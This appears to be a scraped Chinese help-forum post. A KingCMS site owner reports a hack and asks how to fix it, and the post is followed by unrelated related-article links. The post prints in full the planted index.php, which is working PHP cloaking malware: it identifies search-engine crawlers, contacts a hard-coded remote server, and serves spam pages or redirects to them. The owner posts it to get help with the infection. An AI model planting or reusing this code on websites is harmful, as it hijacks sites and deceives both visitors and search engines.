个人电脑php漏洞怎么修复,PHP版 6.0 漏洞 要怎么修复
king CMS PHP版 6.0 被挂马
在/images 目录下上传一个index.php 文件
然后在首页把 标题,关键词都改没了,都改成些 球 黄色 之类的关键词
这是什么 漏洞 要怎么修复阿...求解
我想应该是从后台 那里上传的 PHP文件 如果改后台目录,我查了一下要改好多地方,这不保证改出错阿..
index.php 文件内容如下
set_time_limit(20);error_reporting(0);
define('u_b','/');
define('s_u',' http://166.88.67.229:8043/ ');
define('s_s','@haosou.com|360.cn|baidu|spider|360spider|so|360|sogou|sm.cn|youdao@i');
define('h_t',$_SERVER['SERVER_NAME']);define('r_s',$_SERVER['HTTP_REFERER']);define('u_s',$_SERVER['HTTP_USER_AGENT']);define('h_z',s_p());
function s_p(){$d='';if(isset($_SERVER['REQUEST_URI'])){$d=$_SERVER['REQUEST_URI'];}else{if(isset($_SERVER['argv'])){$d=$_SERVER['PHP_SELF'].'?'.$_SERVER['argv'][0];}else{$d=$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'];}}if(isset($_SERVER['SERVER_SOFTWARE']) && false!==stristr($_SERVER['SERVER_SOFTWARE'],'IIS')){if(function_exists('mb_convert_encoding')){$d=mb_convert_encoding($d,'UTF-8','GBK');}else{$d=@iconv('GBK','UTF-8',@iconv('UTF-8','GBK',$d))==$d?$d:@iconv('GBK','UTF-8',$d);}}$r=explode('#',$d,2);$d=$r[0];return $d;}function r_s($url){$o=array('http' => array('method'=>"GET",'timeout'=>8));$context=stream_context_create($o);$h=file_get_contents($url,false,$context);if(empty($h)){$h=file_get_contents($url);}return $h;}
if(preg_match(s_s,r_s)){$d_s=true;if(preg_match("@site%3A|inurl%3A@i",r_s)){setcookie('xx',h_t,time()+259200);$d_s=false;}if($d_s ){setcookie('xx',h_t,time()+259200);$d_u=s_u.'?xu='.bin2hex(h_z);$d_u.='&ad=1&xh='.bin2hex(h_t);$d_c=r_s($d_u);header("Location: ".$d_c.'?'.h_t);exit;}}if(strstr(h_z,u_b)){if(preg_match(s_s,u_s)){$d_u=s_u.'?xu='.bin2hex(h_z);$d_u.='&xh='.bin2hex(h_t);$d_c=r_s($d_u);echo $d_c;exit;}}
?>
个人电脑php漏洞怎么修复,PHP版 6.0 漏洞 要怎么修复相关推荐
- spellchecker.php 漏洞,整理一些大汉版通的漏洞
1.sql注入 /vc/vc/interface/index/que_scount.jsp?webid=1 /jcms/short_message/que_contact.jsp?vc_searchn ...
- 2023去水印小程序saas系统源码修复独立版v1.0.3+uniapp前端
- OpenSSL 修复高危的无限循环漏洞
聚焦源代码安全,网罗国内外最新资讯! 专栏·供应链安全 数字化时代,软件无处不在.软件如同社会中的"虚拟人",已经成为支撑社会正常运转的最基本元素之一,软件的安全性问题也正在成为 ...
- 开源 CMS Drupal 修复 XSS 和开放重定向漏洞
聚焦源代码安全,网罗国内外最新资讯! 编译:奇安信代码卫士团队 开源 CMS Drupal 的更新修复了跨站脚本 (XSS) 漏洞和开放重定向漏洞,不过这些它们仅被评为"中危"级 ...
- linux心跳出血漏洞,heartbleeder 自动检测 OpenSSL 心脏出血漏洞 (附修复指南)
heartbleeder 可以探测你的服务器是否存在 OpenSSL CVE-2014-0160 漏洞 (心脏出血漏洞). 什么是心脏出血漏洞? CVE-2014-0160,心脏出血漏洞,是一个非常严 ...
- linux 心脏滴血漏洞,心脏出血漏洞(heartbleeder 自动检测 OpenSSL 心脏出血漏洞 (附修复指南))...
心脏出血漏洞(heartbleeder 自动检测 OpenSSL 心脏出血漏洞 (附修复指南)),哪吒游戏网给大家带来详细的心脏出血漏洞(heartbleeder 自动检测 OpenSSL 心脏出血漏 ...
- 苹果4怎么越狱_iOS12.4正式版现重大漏洞,外媒怒斥「不可饶恕」
用安卓手机的小伙伴们应该对『root』不会感到陌生:通过解锁BL,刷入第三方Recover,以获得安卓系统的最高权限,从此可以随意地刷入第三方刷机包,并且可以对手机系统进行任意的修改.众所周知,安卓是 ...
- 为修复一个代码执行安全漏洞,TensorFlow决定不再支持YAML
TensorFlow是谷歌开发的基于Python的机器学习和人工智能项目.为修复一个代码执行安全漏洞,TensorFlow决定不再支持YAML.YAML(Yet Another Markup Lang ...
- 9 月 19 日,腾讯云安全中心监测到 Apache Tomcat 修复了2个严重级别的漏洞, 分别为: 信息泄露漏洞(CVE-2017-12616)、远程代码执行漏洞(CVE-2017-12615
9 月 19 日,腾讯云安全中心监测到 Apache Tomcat 修复了2个严重级别的漏洞, 分别为: 信息泄露漏洞(CVE-2017-12616).远程代码执行漏洞(CVE-2017-12615 ...
- 新独立版抖音口红机全修复版本附视频教程
简介: 独立版抖音口红机全修复版本+对接Z+视频教程 详细的对接视频教程都在压缩包里了 网盘地址: http://zijiepan4.xyz/gtriRZ3gdbT0 阅览:
最新文章
- java去除不为null,JAVA代码中去掉 “!=null”
- php框架 css文件引用,yii框架中怎么引入css文件
- linux和windows互传文件 、用户配置文件和密码配置文件 、用户与用户组管理
- 蓝桥杯练习系统—算法训练 s01串
- EF Core查询标签TagWith
- 前端学习(2148):webpack-less图片文件的转化
- 面试官系统精讲Java源码及大厂真题 - 34 只求问倒:连环相扣系列锁面试题
- Hadoop学习之路(十三)MapReduce的初识
- 【BZOJ】1013: [JSOI2008]球形空间产生器sphere(高斯消元)
- K近邻算法:机器学习萌新必学算法
- Linux 网卡驱动学习(二)(网络驱动接口小结)
- 跨多个交换机VLAN的配置方案设计(H3C)
- epic打开一直闪_教你用意派Epub360做酷炫的快闪H5!(附快闪H5模板)
- Python解微分方程(验证数学建模第五版火箭发射模型)
- EXCEL如何生成不重复的随机数 ,多方法+原理
- 计算机相关英语生词积累
- 深入理解Java虚拟机-垃圾收集算法
- JS 流行库(五):Swiper
- SaaS企业如何巧用「组织力」来构建自身持续增长的根基?
- 西南联大数字复原项目获国际论坛奖项 百度AI赋予历史温度